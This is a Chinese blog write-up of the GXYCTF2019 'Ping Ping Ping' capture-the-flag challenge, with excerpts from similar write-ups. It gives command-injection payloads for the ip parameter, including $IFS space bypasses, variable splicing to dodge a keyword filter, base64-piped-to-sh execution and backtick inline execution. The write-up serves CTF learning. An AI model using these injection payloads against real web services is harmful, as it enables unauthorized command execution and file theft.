[GXYCTF2019]Ping Ping Ping 1

最新推荐文章于 2025-04-27 22:58:30 发布
最新推荐文章于 2025-04-27 22:58:30 发布
阅读量9.4k 收藏 38
点赞数 25
文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51439282/article/details/113378868
版权

[GXYCTF2019]Ping Ping Ping

打开题目可以得到在这里插入图片描述
看来这题是要我们来构造ip

那就先试试127.0.0.1,再用管道符加上linux常用命令ls试试

管道符就是:在这里插入图片描述
构造?ip=127.0.0.1;ls
在这里插入图片描述

好家伙出来了flag.php
直接连接它试试

?ip=127.0.0.1;cat flag
在这里插入图片描述
看来这里空格被过滤了

以下方法可以绕过空格
在这里插入图片描述
一个一个试发现$IFS$1是行得通的

那便构造:?ip=127.0.0.1;cat$IFS$1flag.php

在这里插入图片描述
看来flag也被过滤了

那便试试index
?ip=127.0.0.1;cat$IFS$1index.php

在这里插入图片描述
发现很多符号都过滤了
所以单引号双引号绕过,反斜线绕过这些都行不通了

但仔细观察源码发现有一个变量a可以替换

我们可以尝试构造

/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php

可以发现得到了flag
在这里插入图片描述
这里还可以将cat flag.php进行base64编码

得到Y2F0IGZsYWcucGhw

再用base64-d命令来执行

虽然过滤了bash但大部分仍然可以用sh来执行

则构造echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

还有一种内联执行的方法
所谓内联,就是将反引号内命令的输出作为输入执行

则尝试构造

?ip=127.0.0.1;cat$IFS$9`ls`

在这里插入图片描述
一样可以得到flag

Csrcsyh
关注
[GXYCTF2019]Ping Ping Ping1
2201_75556700的博客
01-31 829
7.这里最后提示可以输入一个参数a但是a的值是什么,我们也不知,但是在构造的时候又不能出现flag所以我们可以让a=g,这样就可避免出现黑名单的字符。2.仔细一看发现那个问号和i有空格,试了一下英文,发现还真不一样,这回页面给了提示。1.点开链接,题目给了提示,于是我尝试了?ip=127.0.0.1,发现没反应。5.这个我们使用$IFS$1这个方法过滤,页面给出显示如下。4.访问index.php文件时,提示我们需要过滤空格。9.接下来我们查看源码,得到了flag。
GXYCTF2019 Ping Ping Ping 1
qq_52715164的博客
04-17 1675
解题步骤: 1,尝试用输入一个正确的IP地址 2,发现是linux系统下的网站,尝试用|和ls查看目录,列出文件 3,尝试查看flag文件,发现不能直接打开,且空格被过滤,原因:关键字被过滤 4,找到被过滤字符名单,尝试打开index.php文件,发现过滤字符列表 5,尝试绕过 代码中有个 $a 考虑进行变量覆盖,构造如下 payload ?ip=1;a=f;d=ag;c=l;cat$IFS$a$c$d.php ?ip=127.0.0.1;a=g,cat$IFS$1fla$a.php 或者另外一种方
BUUCTF刷题记录 Ping Ping Ping
m0_46576074的博客
05-16 1895
[GXYCTF2019]Ping Ping Ping 进入页面 然后/?ip=127.0.0.1|ls 进入 读取flag.php 再cat$IFS$1indnx.php 再变量拼接 ?ip=127.0.0.1;a=g;cat$IFS1fla1fla1flaa.php 转至 http://1d22a0a5-c6a0-43f1-8e52-e5a33ec7e044.node3.buuoj.cn/?ip=127.0.0.1;a=g;cat$IFS1fla1fla1flaa.php 再F12 ...
[GXYCTF2019]Ping Ping Ping
最新发布
2301_81155391的博客
04-27 1033
【代码】[GXYCTF2019]Ping Ping Ping
[第三章][3.1.6 案例解析][GXYCTF2019]Ping Ping Ping
2301_79843470的博客
03-05 480
随便输入1时,如图所示,很明显是ping的回显,那么后端很有可能是通过了php接受了ip参数,这样就存在一个命令注入漏洞。但我们发现flag也被禁用了,并且经过测试发现只要出现*f*l*a*g四个字符就会被拦截。根据提示可知,这里过滤了空格。而经过测试$IFS$9在这里没被过滤。当试着用命令注入读取这个文件,出现fxck your space。当输入ls时,如图,发现有明显回显,并看到了flag.php。
BUUCTF之Ping Ping Ping
金 帛的博客
02-20 7545
BUUCTFWP,关于一些waf的绕过
[GXYCTF2019] Ping Ping
Sweet_vinegar520的博客
10-29 709
本题主要阴间在绕过字符和变量的运用细节上。
CTF-Web习题:[GXYCTF2019]Ping Ping Ping
LJW123487的博客
07-25 895
本题涉及知识点:命令执行漏洞,过滤绕过
buuctf[GXYCTF2019]Ping Ping Ping
hintll的博客
03-21 5471
buuctf[GXYCTF2019]Ping Ping Ping 这个题目的标题是pingping盲猜是关于命令执行的题目 打开环境后 只有一个/ip=? 应该是提示用get的方式来传参一个地址执行ping的操作 直接ping127.0.0.1 回显ping127.0.0.1的数据 说明是一道命令执行的题目 执行:?ip=127.0.0.1|ls 其中|的作用是命令分隔符 还有相关的符号 ; --在 shell 中,是”连续指令” & --不管第一条命令成功与否,都会执行第二条命令 &
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值